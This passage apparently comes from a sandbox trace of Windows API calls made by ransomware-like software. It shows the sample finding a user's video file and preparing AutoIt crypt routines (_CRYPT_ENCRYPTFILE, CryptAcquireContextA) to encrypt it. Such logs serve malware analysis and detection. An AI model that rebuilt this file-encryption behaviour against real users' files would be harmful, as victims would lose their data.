Flags=0x0, Size=0x20) returned 0x8dea38 [0198.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0198.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0198.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0198.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.890] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0198.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0198.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9b50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0198.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0198.890] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0198.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0198.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0198.890] CloseHandle (hObject=0x160) returned 1 [0198.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0198.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0198.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0198.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.891] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.891] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0198.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0198.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0198.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.892] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.892] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0198.892] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.892] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0198.892] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0198.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.892] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.892] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.892] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.892] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8829ec70, ftCreationTime.dwHighDateTime=0x1d5e4da, ftLastAccessTime.dwLowDateTime=0x72a0d840, ftLastAccessTime.dwHighDateTime=0x1d5da45, ftLastWriteTime.dwLowDateTime=0x72a0d840, ftLastWriteTime.dwHighDateTime=0x1d5da45, nFileSizeHigh=0x0, nFileSizeLow=0xf9ea, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="5sGE4.mkv", cAlternateFileName="")) returned 0x90add8 [0198.892] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0198.892] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.893] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8829ec70, ftCreationTime.dwHighDateTime=0x1d5e4da, ftLastAccessTime.dwLowDateTime=0x72a0d840, ftLastAccessTime.dwHighDateTime=0x1d5da45, ftLastWriteTime.dwLowDateTime=0x72a0d840, ftLastWriteTime.dwHighDateTime=0x1d5da45, nFileSizeHigh=0x0, nFileSizeLow=0xf9ea, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="5sGE4.mkv", cAlternateFileName="")) returned 0x90add8 [0198.893] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0198.893] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="58zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zBpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BpaZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="paZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZzgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zgTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gTTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TH\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5sGE4.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.895] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.895] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0198.895] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0198.895] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.895] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.895] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.895] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.895] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.895] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.895] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8829ec70, ftCreationTime.dwHighDateTime=0x1d5e4da, ftLastAccessTime.dwLowDateTime=0x72a0d840, ftLastAccessTime.dwHighDateTime=0x1d5da45, ftLastWriteTime.dwLowDateTime=0x72a0d840, ftLastWriteTime.dwHighDateTime=0x1d5da45, nFileSizeHigh=0x0, nFileSizeLow=0xf9ea, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="5sGE4.mkv", cAlternateFileName="")) returned 0x90ae18 [0198.895] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0198.896] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.896] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.896] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.896] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.896] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0198.896] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.896] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0198.896] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.896] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.896] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0198.896] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.896] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.896] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.896] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.896] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.896] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0198.896] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.897] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0198.897] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.897] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.897] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0198.898] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.898] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, 